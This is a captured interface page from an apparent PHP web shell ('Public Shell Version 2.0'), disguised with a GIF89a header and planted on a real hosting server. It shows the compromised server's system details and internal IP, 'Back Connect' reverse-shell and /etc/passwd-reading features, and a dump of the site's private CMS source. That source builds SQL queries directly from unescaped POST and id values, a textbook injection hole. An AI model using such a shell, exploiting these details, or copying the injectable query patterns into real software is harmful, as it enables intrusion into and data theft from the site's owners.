GIF89a

Public Shell

Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt : '; Public Shell Version 2.0

Disable Functions: system,popen,dl,passthru,proc_open,shell_exec

Current Path : /web/htdocs/www.giancio.com/home/admin/function/

Current File : /web/htdocs/www.giancio.com/home/admin/function/fatturati.php

<?php function listaf() { global $conn, $id; $output = '<div class="row"> <div class="col-md-6"> <div class="headline"> <h3>' . LISTA . ' ' . FATTU . '</h3> </div> </div> <div class="col-md-6"> <a href="?azione=inseriscif" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a> </div> </div>'; $output .= '<div class="row"> <div class="col-md-12"> <div class="table-wrapper"> <div class="wrapper-panel"> <table class="table table-striped" id="tab" > <thead> <tr> <th>Anno</th> <th>Importo</th> <th width="5%"></th> <th width="5%"></th> </tr> </thead> <tbody>'; $result=mysql_query('select * from fatturato order by ft_anno ASC'); while($row=mysql_fetch_assoc($result)) { $output.='<tr> <td>'.$row['ft_anno'].'</a></td> <td>'.$row['ft_importo'].'</a></td> <td><a title="Modifica" href="cms.php?azione=modificaf&id='.$row['ft_id'].'"><i class="icon-edit"></i></a></td> <td><a class="right cancel show-option" title="Elimina" href="cms.php?azione=eliminaf&id='.$row['ft_id'].'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>'; $output.='</tr>'; } $output .= '</tbody> </table> </div> <div class="wrapper-paging pull-right"> <ul> <li><a class="paging-back"><</a></li> <li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li> <li><a class="paging-next">></a></li> </ul> </div> <br /><br /> </div> </div> </div>'; return ($output); } function resultf() { global $conn, $id; $result = mysql_real_escape_string($_POST['ricerca']); $output = '<span class="left"><h1 class="left">' . LISTA . ' ' . FATTU . '</h1>    <a class="right button" href="?azione=inseriscif">' . ADD . ' »</a></span><span class="right">'; $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=resultf" method="post">'; $output .= '<input type="text" style="padding:5px" id="ricerca" name="ricerca"/>'; $output .= '  <input type="submit" value="' . CERCA . '" id="myButton"/>'; $output .= '</form></span>'; $output .= '<div id="show" class="clear">'; $output .= '<table align="center" width="100%">'; $output .= '<tr style="background-color:#555555"> <th>Username</th> <th>Permission</th> <th></th> <th></th> </tr>'; $sql = 'select * from fatturato WHERE ft_anno like \'%' . $result . '%\'order by ft_id DESC'; $dati = mysql_query($sql, $conn) or die(mysql_error()); if(mysql_num_rows($dati)>0){ while ($array = mysql_fetch_array($dati)) { if ($array['ft_abilitato'] == 1) {$abilitazione = 'Administrator'; } else {$abilitazione = 'Member'; } $output .= '<tr bgcolor=#dddddd> <td>'.$row['ft_anno'].'</a></td> <td>'.$row['ft_importo'].'</a></td><td align="center"><a class="right modifica show-option" title="' . MOD . ' Password" href="index.php?azione=modificaf&id=' . $array['ft_id'] . '"></a></td>'; $output .= '<td align="center"><a class="right cancel show-option" title="' . DELETE . '" href="index.php?azione=eliminaf&id=' . $array['ft_id'] . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"></a></td>'; $output .= '</tr>'; } $output .= '</table><br /><br />'; $output .= '</div>'; } else{ $output .= '<tr>'; $output .= '<td colspan="4">Nessun risultato</td>'; $output .= '</tr>'; $output .= '</table><br /><br />'; $output .= '</div>'; } return ($output); } function inseriscif() { global $conn, $id; $output = '<div class="row"> <div class="col-md-10"> <div class="headline"> <h3>'.ADD.' ' . FATTU . '</h3> </div> </div> <div class="col-md-2"> <a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a> </div> </div>'; $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvaf&id=' . $id . '" method="post"> <div class="row"> <div class="col-md-4"> <label>ANNO</label> <input class="form-control" type="text" placeholder="Type something…" name="anno"> </div> </div> <br /> <div class="row"> <div class="col-md-4"> <label>IMPORTO</label> <input class="form-control" type="text" placeholder="Type something…" name="importo"> </div> </div> <br /> <button class="btn btn-default" type="submit">Salva</button> <br /><br /> </form>'; return ($output); } function modificaf() { global $conn, $id; $sql = 'select * from fatturato where ft_id="' . $id . '" '; $dati_ute = mysql_query($sql) or die(mysql_error()); $array_ute = mysql_fetch_array($dati_ute); $output = '<div class="row"> <div class="col-md-10"> <div class="headline"> <h3>'.MOD.' ' . FATTU . '</h3> </div> </div> <div class="col-md-2"> <a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a> </div> </div>'; $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvaf&id=' . $id . '" method="post"> <div class="row"> <div class="col-md-4"> <label>Anno</label> <input class="form-control" type="text" placeholder="Type something…" name="anno" value="'.$array_ute['ft_anno'].'""> </div> </div> <br /> <div class="row"> <div class="col-md-4"> <label>Importo</label> <input class="form-control" type="text" placeholder="Type something…" name="importo" value="'.$array_ute['ft_importo'].'"> </div> </div> <br /> <button class="btn btn-default" type="submit">Salva</button> <br /><br /> </form>'; return ($output); } function salvaf() { global $conn, $id; $errore = 0; $anno = $_POST['anno']; $importo = $_POST['importo']; if ($errore == 0) { if ($id == 0) { $sql = 'insert into fatturato(ft_anno, ft_importo) values("' . $anno . '", "' . $importo . '")'; $output = 'Record inserito.<br /><a href="index.php?azione=listan">Torna alla lista</a>'; mysql_query($sql, $conn) or die(mysql_error()); header('location: cms.php?ins&azione=listaf'); //restituisci messaggio di errore return ($output); $id = mysql_insert_id(); } else { $sql = 'update fatturato set ft_anno="' . $anno . '",ft_importo="' . $importo . '" where ft_id="' . $id . '" '; $output = 'Record aggiornato.<br /><a href="index.php?azione=listan&page=1">Torna alla lista</a>'; mysql_query($sql, $conn) or die(mysql_error()); header('location: cms.php?agg&azione=listaf'); } } else {$output = 'errore nel form.<br /><a href="javascript:history.go(-1)">Torna indietro</a>'; } return ($output); } function eliminaf() { global $conn, $id; $sql = 'delete from fatturato where ft_id="' . $id . '"'; mysql_query($sql) or die(mysql_error()); header('location: cms.php?del&azione=listaf'); } ?>

Public Shell Version 2.0